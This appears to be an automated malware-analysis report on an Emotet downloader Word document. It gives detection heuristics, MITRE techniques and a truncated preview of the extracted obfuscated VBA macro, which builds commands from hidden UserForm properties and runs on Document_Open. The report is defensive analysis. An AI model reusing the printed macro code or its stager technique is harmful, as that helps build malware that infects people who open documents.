MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7464357-0', strongly indicating the Emotet family. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager that executes automatically via the Document_Open macro, using CreateObject and GetObject calls to likely download and run a secondary payload. The embedded VBA macro 'macros.bas' is the source of this malicious behavior.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7464357-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464357-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13306 bytes |
SHA-256: 2fd6c1d13d86485279b9625ca65b0d8796c33dc2c319c4c2f1adfc3fe19d0ecf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Eeglwfvuypu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Srabtjse, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Jteniafb = "Peggy"
Dim Xrfxwfqtvcm As Double
Dim Wqjgyebmukwbv As Double
Emdaknscfk = ("Marilyn")
Dim Qtsbnruiwz As Double
Dim Wybdgiwbm As Boolean
Dim Iylgldodwst As String
Bjijajpftxel = Wwoeymdkcbk
Dim Ivxocnibw As String
Bdokobhuap = ("Sequi quia itaque ipsam molestiae ipsa quos debitis perferendis.")
Dim Hnvzprhgy As Boolean
Dim Gjwibycnz As Boolean
Dim Dvxtvbup As Double
Qopagotjpsn = "Rerum tempora."
Dim Iassgwxbsjfka As String
Dim Wfmjjppughuk As Boolean
Dim Kepuwosd As Double
Tkoyfkqflyn = ("Rerum ipsum sed mollitia voluptatem aliquam et sunt.")
Dim Ezisglkll As Integer
Heqpencswypzb = 152
Wrpykpaykvn = Rycivpraua
Vunhozhbrptvm = 340
Mqdsecahoyom
Ygpzjssp = "Orville"
Dim Jdssgggbljuww As Double
Dim Rnizqgtdmu As Integer
Aaddjoqdimwn = ("Delbert")
Dim Ahbgckuos As Integer
Dim Qnrpzfyzmf As Double
Dim Flhfrbfru As Integer
Glcgsxylhy = Bynjgyouzyaw
Dim Ednmnoyckexz As Boolean
Nutjmsfh = ("Delectus magnam et quos est provident.")
Dim Ztgxlilgkxtv As Boolean
Dim Keuznilgsmge As Integer
Dim Jcowyunuiaq As Integer
Rpiisvzzhygt = "Consequuntur error possimus voluptas placeat."
Dim Sauqheuwi As Double
Dim Xdhpwtjlourjd As Integer
Dim Frbeidcnuu As Boolean
Jyzvgzmurs = ("Debitis at.")
Dim Ewihmbqrby As Boolean
Udasvqmv = 823
Ampzkkquqn = Zlvubtdwikz
Dytzbfoc = 859
End Sub
Attribute VB_Name = "Ocqunouq"
Attribute VB_Base = "0{E0F51CF9-E923-4BF1-A02D-9AFD67A4F88D}{80D98A36-08FF-41AE-9287-7B1F2DD63418}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Whsthngo"
Function Ooomipyk()
Vzxszlcqk = "Aliquam sunt et nostrum."
Dim Rbtpwxzoo As Double
Dim Oqkpwuycnlt As Boolean
Nzizkrscq = ("Aut.")
Dim Byandtbb As Double
Dim Lhikohrhh As Integer
Dim Incwpzdxrnxtj As Integer
Tkzukrxzbszpv = Uibdtkyq
Dim Xefsnnywqohh As Double
Fknaepkhnq = ("Reprehenderit enim.")
Dim Rguoutlamns As Double
Dim Fbsfutmvrxi As String
Dim Mxiprozywsbcu As Boolean
Mxssgmzorcsxg = "Quos esse quisquam quo."
Dim Jmrwhnrwvdipi As String
Dim Dagqjteppmnj As Integer
Dim Yrsfwjokyfi As Integer
Wpywqfay = ("Delectus tenetur sunt.")
Dim Pjgexbjteaj As Integer
Pjmzctcaio = 402
Arpxdroga = Qeriomdurzcjn
Xfpqhvnxw = 791
Fqnczrgmr = Eeglwfvuypu.Srabtjse
Kohnpgtz = "Dolor quod consequuntur perferendis reprehenderit qui ab."
Dim Vvbnauikohl As String
Dim Vihfarfrsrps As Integer
Zjvwobyur = ("Dolor cupiditate et et.")
Dim Boxnsdrutm As String
Dim Ashlzcemu As String
Dim Jbskwowarow As Double
Ieanxyuv = Vdhpzrmg
Dim Bnmztufxlot As Integer
Educrowtrpzx = ("Dana")
Dim Zxjeihlburb As Integer
Dim Swkfiqkc As Boolean
Dim Pvsrukxm As Double
Egzcjlxhdid = "Voluptatem ratione voluptatem."
Dim Kewgkrgvnmsti As String
Dim Qqxezgymwiv As Integer
Dim Dydboyhnydnv As Boolean
Qthibvirnlyb = ("Perferendis saepe.")
Dim Szyounspir As Double
Ibrmjjdphs = 164
Ublmlscmiuuzf = Iybkpdqm
Aboyaezjyusbg = 627
Qlbsdnpiqxfiy = Fqnczrgmr + Ocqunouq.Jtsmkdqpig + Ocqunouq.Tqmdsjidz + Ocqunouq.Hpkiuhnpwqlk
Ejzduzgvbn = "Vitae quia non."
Dim Jdnlqdiqdnqm As String
Dim Rsvgiwuuxfyft As Double
Sosdwqgym = ("Corporis eligendi sed.")
Dim Yoirtmavhoaue As Boolean
Dim Pfhnlkgllyyjf As Integer
Dim Tifiyglgml As Double
Tqrtnwxbaqypo = Xsudumwu
Dim Whtdzvbhmmv As Integer
Knihkcjp = ("At earum saepe.")
Dim Donrijlxv As Boolean
Dim Rodyavxic As Double
Dim Dokpmfmri As Boolean
Apometxb = "Rerum tempore accusantium."
Dim Uztyfjjhmhrcx As Integer
Dim Hsxfkerfponjo As Double
Dim Kaohjoqr As Boolean
Cjvrkxsdnwaav = ("Loretta")
Dim Cudkravqiwrn As Stri
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.